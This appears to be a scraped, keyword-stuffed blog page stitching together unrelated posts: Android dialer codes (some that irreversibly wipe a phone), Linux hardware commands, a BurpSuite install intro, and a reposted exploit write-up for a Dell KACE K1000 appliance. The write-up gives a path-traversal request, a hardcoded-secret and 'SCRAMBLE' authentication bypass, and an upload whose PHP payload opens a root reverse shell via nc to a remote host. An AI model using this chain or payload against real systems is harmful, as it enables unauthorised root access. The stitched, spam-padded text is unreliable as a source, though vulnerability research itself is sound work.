Sunday, 30 August 2020

Secret Hack Codes For Android Mobile Phones

Secrete Hack codes for Android Mobile phones

Secret hack codes are usually hidden from users to prevent misuse and exploit. Android is a very new platform so there aren't many hack codes for Androids available. Today I will share all of the hack codes of Android cellphones that I know. I have tested these codes on my Samsung Galaxy with the Android OS version 2.2. I am sure these will work on all previous versions. 


Secret Hack Codes for Android Mobile Phones:


1. Complete Information About Your Phone 

 *#*#4636#*#*

 This code can be used to get some interesting information about your phone and battery. It shows the following 4 menus on the screen:

  • Phone information
  • Battery information (How to maximize or boost battery life in android phones)
  • Battery history
  • Usage statistics


2. Factory data reset


*#*#7780#*#*

This code can be used for a factory data reset. It'll remove the following things:

  • Google account settings stored in your phone
  • System and application data and settings
  • Downloaded applications

It will NOT remove:

  • Current system software and bundled application
  • SD card files e.g. photos, music files, etc.

Note: Once you give this code, you will get a prompt screen asking you to click on the "Reset phone" button, giving you the chance to cancel your operation.


3. Format Android Phone


  *2767*3855#

Think before you input this code. This code is used for factory formatting. It will remove all files and settings, including the internal memory storage. It will also reinstall the phone firmware.

Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone.


4. Phone Camera Update


*#*#34971539#*#*

This code is used to get information about phone camera. It shows following 4 menus:

  • Update camera firmware in image (Don't try this option)
  • Update camera firmware in SD card
  • Get camera firmware version
  • Get firmware update count

WARNING: NEVER use the first option. Your phone camera will stop working and you will need to take your phone to a service center to reinstall camera firmware.


5. End Call/Power

 

*#*#7594#*#*

This one is my favorite. This code can be used to change the action of the "End Call/Power" button. Be default, if you hold the button down for a long time, it shows a screen asking you to select between silent mode, airplane mode, and power off.

Using this code, you can enable this button to power off without having to select an option, saving you some time.


6. File Copy for Creating Backup


*#*#273283*255*663282*#*#*


This code opens a file copy screen where you can backup your media files e.g. images, sound, video and voice memo.


7.  Service Mode


*#*#197328640#*#*

This code can be used to enter into service mode. In service mode, you can run various tests and change settings.


8. WLAN, GPS and Bluetooth Secret Hack Codes for Android:


*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#*           – WLAN test (Use "Menu" button to start various tests)

*#*#232338#*#*                  – Shows WiFi MAC address

*#*#1472365#*#*                – GPS test

*#*#1575#*#*                      – Another GPS test

*#*#232331#*#*                  – Bluetooth test

*#*#232337#*#                    – Shows Bluetooth device address


9. Codes to get Firmware version information:


*#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate

*#*#1234#*#* – PDA and Phone

*#*#1111#*#* – FTA SW Version

*#*#2222#*#* – FTA HW Version

*#*#44336#*#* – PDA, Phone, CSC, Build Time, Changelist number


10. Codes to launch various Factory Tests:


*#*#0283#*#* – Packet Loopback

*#*#0*#*#* – LCD test

*#*#0673#*#* OR *#*#0289#*#* – Melody test

*#*#0842#*#* – Device test (Vibration test and BackLight test)

*#*#2663#*#* – Touch screen version

*#*#2664#*#* – Touch screen test

*#*#0588#*#* – Proximity sensor test

*#*#3264#*#* – RAM version


@EVERYTHING NT

Read more


Top Linux Commands Related To Hardware With Descriptive Definitions


Commands in Linux are just the keys to explore and close the Linux. As you can do things manually by simple clicking over the programs just like windows to open an applications. But if you don't have any idea about commands of Linux and definitely you also don't know about the Linux terminal. You cannot explore Linux deeply. Because terminal is the brain of the Linux and you can do everything by using Linux terminal in any Linux distribution. So, if you wanna work over the Linux distro then you should know about the commands as well. In this blog you will exactly get the content about Linux hardware commands which are related to CPU and memory processes.

dmesg

The dmesg command is used in Linux distribution for the sake of detecting hardware and boot messages in the Linux system.

cat /proc/cpuinfo

The cat command is basically used to read something over the terminal like cat index.py will display all the content which exist in index.py over the terminal. So cat /proc/cpuinfo will display the model of the CPU over the terminal.

cat /proc/meminfo

This command is similar to the above command but the only difference is that this command shows the information of hardware memory over the terminal. Because it will open the memory info file over the terminal.

cat /proc/interrupts

This command is also similar to the above command but there is the difference of one thing that this command will display lists the number of interrupts per CPU per input output device.

lshw

This command is used in Linux operating system to displays information on hardware configuration of the system in Linux.

lsblk

The "lsblk" command is used in Linux operating system to displays block device related information in the Linux operating system.

dmidecode

The "dmidecode" command is used in Linux distributions to display the information about hardware from the BIOS.

hdparm -i /dev/sda

The hdparm command basically used to display the information about the disks available in the system. If you wanna know the information about the "sda" disk so just type "hdparm -i /dev/sda" and if you wanna know the information about "sdb" so just type "hdparm -i /dev/sdb".

hdparm -tT

The "hdparm" command is used for displaying the information about disks as we discussed in above command. If you wanna do a read speed test on the disk sda or sdb just type the command "hdparm -tT /dev/sda".

badblocks -s /dev/sda

This command is used in linux to display test operations for unreadable blocks on disk sda. If the command is like "badblocks -s /dev/sdb" it will display test operations for unreadable blocks on disk sdb.

Related posts


The Curious Case Of The Ninjamonkeypiratelaser Backdoor

A bit over a month ago I had the chance to play with a Dell KACE K1000 appliance ("http://www.kace.com/products/systems-management-appliance"). I'm not even sure how to feel about what I saw, mostly I was just disgusted. All of the following was confirmed on the latest version of the K1000 appliance (5.5.90545), if they weren't working on a patch for this - they are now.

Anyways, the first bug I ran into was an authenticated script that was vulnerable to path traversal:
POST /userui/downloadpxy.php HTTP/1.1
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=xxxxxxxxxxxxxxxxxxxxxxxx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
DOWNLOAD_SOFTWARE_ID=1227&DOWNLOAD_FILE=../../../../../../../../../../usr/local/etc/php.ini&ID=7&Download=Download

HTTP/1.1 200 OK
Date: Tue, 04 Feb 2014 21:38:39 GMT
Server: Apache
Expires: 0
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: public
Content-Length: 47071
Content-Disposition: attachment; filename*=UTF-8''..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Fetc%2Fphp.ini
X-DellKACE-Appliance: k1000
X-DellKACE-Version: 5.5.90545
X-KBOX-Version: 5.5.90545
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/ini
[PHP]
;;;;;;;;;;;;;;;;;;;
; About php.ini   ;
;;;;;;;;;;;;;;;;;;;
That bug is neat, but its post-auth and can't be used for RCE because it returns the file as an attachment :(

So moving along, I utilized the previous bug to navigate the file system (its nice enough to give a directory listing if a path is provided, thanks!), this led me to a file named "kbot_upload.php". This file is located on the appliance at the following location:
http://targethost/service/kbot_upload.php
This script includes "KBotUpload.class.php" and then calls "KBotUpload::HandlePUT()", it does not check for a valid session and utilizes its own "special" means to auth the request.

The "HandlePut()" function contains the following calls:

        $checksumFn = $_GET['filename'];
        $fn = rawurldecode($_GET['filename']);
        $machineId = $_GET['machineId'];
        $checksum = $_GET['checksum'];
        $mac = $_GET['mac'];
        $kbotId = $_GET['kbotId'];
        $version = $_GET['version'];
        $patchScheduleId = $_GET['patchscheduleid'];
        if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
            KBLog($_SERVER["REMOTE_ADDR"] . " token checksum did not match, "
                  ."($machineId, $checksumFn, $mac)");
            KBLog($_SERVER['REMOTE_ADDR'] . " returning 500 "
                  ."from HandlePUT(".construct_url($_GET).")");
            header("Status: 500", true, 500);
            return;
        }

The server checks to ensure that the request is authorized by inspecting the "checksum" variable that is part of the server request. This "checksum" variable is created by the client using the following:

      md5("$filename $machineId $mac" . 'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');

Server side check:
    private static function calcTokenChecksum($filename, $machineId, $mac)
    {
        //return md5("$filename $machineId $mac" . $ip .
        //           'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
     
        // our tracking of ips really sucks and when I'm vpn'ed from
        // home I couldn't get patching to work, cause the ip that
        // was on the machine record was different from the
        // remote server ip.
        return md5("$filename $machineId $mac" .
                   'ninjamonkeypiratelaser#[@g3rnboawi9e9ff');
    }
The "secret" value is hardcoded into the application and cannot be changed by the end user (backdoor++;). Once an attacker knows this value, they are able to bypass the authorization check and upload a file to the server. 

In addition to this "calcTokenChecksumcheck, there is a hardcoded value of "SCRAMBLE" that can be provided by the attacker that will bypass the auth check (backdoor++;):  
 if ($checksum != self::calcTokenChecksum($machineId, $checksumFn, $mac) && $checksum != "SCRAMBLE") {
Once this check is bypassed we are able to write a file anywhere on the server where we have permissions (thanks directory traversal #2!), at this time we are running in the context of the "www" user (boooooo). The "www" user has permission to write to the directory "/kbox/kboxwww/tmp", time to escalate to something more useful :)

From our new home in "tmp" with our weak user it was discovered that the KACE K1000 application contains admin functionality (not exposed to the webroot) that is able to execute commands as root using some IPC ("KSudoClient.class.php").


The "KSudoClient.class.php" can be used to execute commands as root, specifically the function "RunCommandWait". The following application call utilizes everything that was outlined above and sets up a reverse root shell, "REMOTEHOST" would be replaced with the host we want the server to connect back to:
    POST /service/kbot_upload.php?filename=db.php&machineId=../../../kboxwww/tmp/&checksum=SCRAMBLE&mac=xxx&kbotId=blah&version=blah&patchsecheduleid=blah HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Content-Length: 190
    <?php
    require_once 'KSudoClient.class.php';
    KSudoClient::RunCommandWait("rm /kbox/kboxwww/tmp/db.php;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc REMOTEHOST 4444 >/tmp/f");?> 
Once this was sent, we can setup our listener on our server and call the file we uploaded and receive our root shell:
    http://targethost/service/tmp/db.php
On our host:
    ~$ ncat -lkvp 4444
    Ncat: Version 5.21 ( http://nmap.org/ncat )
    Ncat: Listening on 0.0.0.0:4444
    Ncat: Connection from XX.XX.XX.XX
    sh: can't access tty; job control turned off
    # id
    uid=0(root) gid=0(wheel) groups=0(wheel)  

So at the end of the the day the count looks like this:
Directory Traversals: 2
Backdoors: 2
Privilege Escalation: 1
That all adds up to owned last time I checked.

Example PoC can be found at the following location:
https://github.com/steponequit/kaced/blob/master/kaced.py

Example usage can be seen below:


Related word


  1. Hacking Tools Github
  2. Tools For Hacker
  3. Hack Tools Mac
  4. Pentest Tools Alternative
  5. Hacking Tools Kit
  6. Hacking Tools Online
  7. Pentest Tools
  8. Hacker Tools
  9. Game Hacking
  10. Hacker Techniques Tools And Incident Handling
  11. Hackers Toolbox
  12. Install Pentest Tools Ubuntu
  13. Pentest Tools Free
  14. Pentest Tools For Ubuntu
  15. Pentest Tools Kali Linux
  16. Hak5 Tools
  17. Hack Tools Download
  18. Hacker Techniques Tools And Incident Handling
  19. Hack Apps
  20. Pentest Tools
  21. Hacker Tools For Ios
  22. Hacker Tools List
  23. Black Hat Hacker Tools
  24. Hacker Security Tools
  25. Hacker Tools Software
  26. Pentest Tools Kali Linux
  27. Hacker Tools For Ios
  28. Hacker Techniques Tools And Incident Handling
  29. Kik Hack Tools
  30. Hack Rom Tools
  31. Hacks And Tools
  32. Hacking Tools For Windows Free Download
  33. Pentest Tools Download
  34. Termux Hacking Tools 2019
  35. Hacker Tools Apk
  36. Hacking Tools For Games
  37. Hacker Tools For Windows
  38. Free Pentest Tools For Windows
  39. Hackrf Tools
  40. Best Hacking Tools 2020
  41. Hack Tools
  42. Pentest Tools Github
  43. Pentest Box Tools Download
  44. Hack Tools 2019
  45. Hacking Tools Download
  46. Hack Tools For Games
  47. Pentest Reporting Tools
  48. Hacking Tools Pc
  49. Pentest Tools For Android
  50. Hacking Tools And Software
  51. Pentest Tools Framework
  52. Hacking Tools For Beginners
  53. World No 1 Hacker Software
  54. Hacking Tools Hardware
  55. Hacking Tools For Beginners
  56. Pentest Tools Online
  57. Hack Tools
  58. Pentest Tools List
  59. Android Hack Tools Github
  60. Hack Tools Download
  61. Pentest Tools For Mac
  62. Hacker Tools Apk
  63. Pentest Automation Tools
  64. Tools 4 Hack
  65. Pentest Tools Download
  66. Hacking Tools Download
  67. Pentest Tools Port Scanner
  68. Pentest Tools Github
  69. Best Pentesting Tools 2018
  70. Nsa Hacker Tools
  71. Tools 4 Hack
  72. Hack Rom Tools
  73. Termux Hacking Tools 2019
  74. Hacking Tools Name
  75. Hacker Security Tools
  76. Pentest Tools For Android
  77. Pentest Tools Open Source
  78. Pentest Reporting Tools
  79. Hacking Tools For Kali Linux
  80. Tools For Hacker
  81. How To Install Pentest Tools In Ubuntu
  82. Android Hack Tools Github
  83. Hacker Tools Apk Download
  84. Hacker Tools Apk Download
  85. Pentest Tools For Windows
  86. Hacking Tools Windows
  87. Hack Tools
  88. Github Hacking Tools
  89. Pentest Recon Tools
  90. Pentest Tools Bluekeep
  91. Hack Tools Pc
  92. Free Pentest Tools For Windows
  93. Pentest Tools Framework
  94. Hacking Tools Free Download
  95. Hack Tools
  96. Nsa Hack Tools Download
  97. How To Hack
  98. Hacker Tools Hardware
  99. Hack Tool Apk
  100. Nsa Hack Tools
  101. Pentest Tools Tcp Port Scanner
  102. Pentest Tools Online
  103. What Is Hacking Tools
  104. Hacking Tools For Windows Free Download
  105. Install Pentest Tools Ubuntu
  106. Pentest Tools List
  107. Hacker Tools Apk Download
  108. Hacker Tools Free
  109. Pentest Tools Apk
  110. Hacker Tools 2020
  111. Hacker Tools Hardware
  112. Hacking Tools Pc
  113. Tools 4 Hack
  114. Hacker Tools For Mac
  115. Tools For Hacker
  116. Pentest Tools List
  117. Beginner Hacker Tools

Saturday, 29 August 2020

BurpSuite Introduction & Installation



What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.




You need to install compatible version of java , So that you can run BurpSuite.
Related links

  1. Hacker Tools Linux
  2. Hacker Tools Windows
  3. Black Hat Hacker Tools
  4. Hacking Tools Software
  5. Pentest Tools Port Scanner
  6. Hack Tools For Ubuntu
  7. Best Hacking Tools 2020
  8. Hack Tools For Mac
  9. Hacker Tools For Windows
  10. Pentest Box Tools Download
  11. Hack Tools Github
  12. Hacker Search Tools
  13. Hacking Tools For Kali Linux
  14. Hack Tools Download
  15. Usb Pentest Tools
  16. Hacking Tools
  17. Pentest Tools Online
  18. Hacker Tools Online
  19. Pentest Tools Nmap
  20. Hacking Tools Online
  21. Hack Tools For Mac
  22. New Hacker Tools
  23. Hacker Tools Free Download
  24. Pentest Tools Android
  25. Hack Tools
  26. Pentest Tools Free
  27. Tools For Hacker
  28. Pentest Tools Kali Linux
  29. Pentest Tools Subdomain
  30. Pentest Tools Find Subdomains
  31. Pentest Tools Website
  32. Hacker Techniques Tools And Incident Handling
  33. Hacker Tools For Ios
  34. Best Hacking Tools 2019
  35. Hacker Tools For Mac
  36. Hacking Tools Github
  37. Hack Tools For Ubuntu
  38. Hack Apps
  39. Pentest Tools Kali Linux
  40. Hacker Tools Free Download
  41. Hack Tools Download
  42. Hak5 Tools
  43. Hacker Tools For Pc
  44. Pentest Tools Online
  45. Best Pentesting Tools 2018
  46. Nsa Hacker Tools
  47. Hack Tools For Games
  48. Hack Tool Apk No Root
  49. Hacking Tools Download
  50. Hacks And Tools
  51. New Hacker Tools
  52. Hacks And Tools
  53. Hacking Tools Pc
  54. Tools For Hacker
  55. Hacker Hardware Tools
  56. Blackhat Hacker Tools
  57. Tools 4 Hack
  58. Best Hacking Tools 2019
  59. Hacker Tools Hardware
  60. Hack Website Online Tool
  61. Pentest Tools Framework
  62. Underground Hacker Sites
  63. Hacker Tools Software
  64. Pentest Tools Android
  65. Tools Used For Hacking
  66. Computer Hacker
  67. Hacking Tools Pc
  68. Pentest Tools Free
  69. Tools For Hacker
  70. Pentest Recon Tools
  71. Ethical Hacker Tools
  72. Pentest Tools Android
  73. Hacking Tools Mac
  74. Hacker Tool Kit
  75. Pentest Tools Free
  76. Nsa Hack Tools Download
  77. Hacking Tools Windows 10
  78. Bluetooth Hacking Tools Kali
  79. Hacking Tools Free Download
  80. Hack Tools For Games
  81. Best Pentesting Tools 2018
  82. Hacking Tools For Mac
  83. Hacking Tools Mac
  84. Pentest Tools Tcp Port Scanner
  85. Pentest Tools Review
  86. Android Hack Tools Github